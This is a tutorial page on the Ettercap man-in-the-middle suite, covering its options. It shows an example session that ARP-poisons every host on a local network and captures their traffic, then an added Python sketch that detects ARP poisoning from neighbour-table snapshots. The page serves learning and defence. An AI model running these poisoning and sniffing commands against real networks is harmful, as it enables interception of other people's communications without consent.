Ettercap

Description

Ettercap is a comprehensive suite for man-in-the-middle attacks. It features sniffing of live connections, on-the-fly content filtering, and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

Usage

Syntax

ettercap [OPTIONS] [TARGET1] [TARGET2]

Options

  -i, --iface <iface>         use this network interface
  -I, --liface                show all the network interfaces
  -Y, --secondary <ifaces>    list of secondary network interfaces
  -n, --netmask <netmask>     force this <netmask> on iface
  -A, --address <address>     force this local <address> on iface
  -P, --plugin <plugin>       launch this <plugin>
  -F, --filter <file>         load the filter <file> (content filter)
  -z, --silent                do not perform the initial ARP scan
  -j, --load-hosts <file>     load the hosts list from <file>
  -k, --save-hosts <file>     save the hosts list to <file>
  -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)
  -a, --config <config>       use the alterative config file <config>

Example

cyborg@cyborg:~$ sudo ettercap -Tq -i eth0 -M arp:remote /// /// -w cap.pcap 

ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team

Listening on:
  eth0 -> 00:E0:4C:37:00:93
	  192.168.1.6/255.255.255.0
	  fe80::2e0:4cff:fe37:93/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
16074 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

9 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


Inline help:

 [vV]      - change the visualization mode
 [pP]      - activate a plugin
 [fF]      - (de)activate a filter
 [lL]      - print the hosts list
 [oO]      - print the profiles list
 [cC]      - print the connections list
 [sS]      - print interfaces statistics
 [<space>] - stop/cont printing packets
 [qQ]      - quit



Hosts list:

1)	fe80::1	10:FE:ED:B7:A5:42
2)	192.168.1.1	10:FE:ED:B7:A5:42
3)	fe80::cca5:e8db:6058:1843	74:DE:2B:C3:A0:2F
4)	192.168.1.2	3C:97:0E:B6:7F:E5
5)	192.168.1.5	74:DE:2B:C3:A0:2F
6)	192.168.1.7	94:EB:CD:4A:48:5C
7)	192.168.1.18	C8:F7:33:77:1A:BE
8)	fe80::cdf0:7093:3117:47e5	C8:F7:33:77:1A:BE
9)	192.168.1.40	10:78:D2:2B:8F:E1
10)	254.128.0.0	00:E0:4C:37:00:93



Packet visualization restarted...


Mon Nov 16 14:00:41 2015
TCP  162.144.208.86:80 --> 192.168.1.40:55353 | A

.A.....\.g.\<..c.`|..|X.k..=..e..M....>..:.J.Y.
........n.....;nF{*....g.YNYM-vi[*.ON.....:..\....{.......^..a..h.>.......&..yH..*.........e>........................H....f...y/n.GQ..)..wt.).......<7.........".k..?Dy.f.Y..H.6...<..C...g2...D~...]...h.v>.]..bmpq..=...{=G>g.....(.....di...`-s..^..\h....ei.)s.(.....J"..1.o....i?m..jX..V4.......m..|...........y~......
6t...........o...'.......4....RkvDn........m....GOYRM*....+......[....K/.*s...fi
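Detection side of the session above, as an added example that is not part of the original page or of the Ettercap project: while `-M arp:remote` is running, hosts on the segment see the gateway and their peers resolve to the sniffing interface's MAC. The sketch compares two snapshots of `ip neigh` output and reports IPv4 addresses whose MAC changed and MACs that answer for several addresses. The snapshots are constructed, reusing addresses from the session above; the function names are hypothetical.

```python
import re
from collections import defaultdict

# IPv4 entries of `ip neigh` output that carry a resolved link-layer address, e.g.
# "192.168.1.1 dev eth0 lladdr 10:fe:ed:b7:a5:42 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5})\b",
    re.IGNORECASE,
)

def parse_neigh(text):
    """Return {ipv4: mac}; unresolved entries (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(baseline, current):
    """Return (changed, shared): IPs whose MAC moved, and MACs claiming >1 IP."""
    changed = {ip: (baseline[ip], mac) for ip, mac in current.items()
               if ip in baseline and baseline[ip] != mac}
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    shared = {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}
    return changed, shared

# Constructed snapshots as seen from another host on the LAN (assumption).
BASELINE = """\
192.168.1.1 dev eth0 lladdr 10:fe:ed:b7:a5:42 REACHABLE
192.168.1.6 dev eth0 lladdr 00:e0:4c:37:00:93 STALE
192.168.1.5 dev eth0 lladdr 74:de:2b:c3:a0:2f STALE
192.168.1.99 dev eth0 FAILED
"""
POISONED = """\
192.168.1.1 dev eth0 lladdr 00:e0:4c:37:00:93 REACHABLE
192.168.1.6 dev eth0 lladdr 00:e0:4c:37:00:93 REACHABLE
192.168.1.5 dev eth0 lladdr 00:e0:4c:37:00:93 REACHABLE
"""

if __name__ == "__main__":
    changed, shared = find_arp_anomalies(parse_neigh(BASELINE), parse_neigh(POISONED))
    for ip, (old, new) in sorted(changed.items()):
        print(f"ALERT {ip}: MAC changed {old} -> {new}")
    for mac, ips in shared.items():
        print(f"ALERT {mac} answers for {', '.join(ips)}")
```

A MAC shared by several IPv4 addresses can be legitimate (proxy ARP, a multi-homed router), so treat the second result as a lead to check against the switch's MAC table rather than as proof.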

©2017 Ztrela Knowledge Solutions Pvt. Ltd
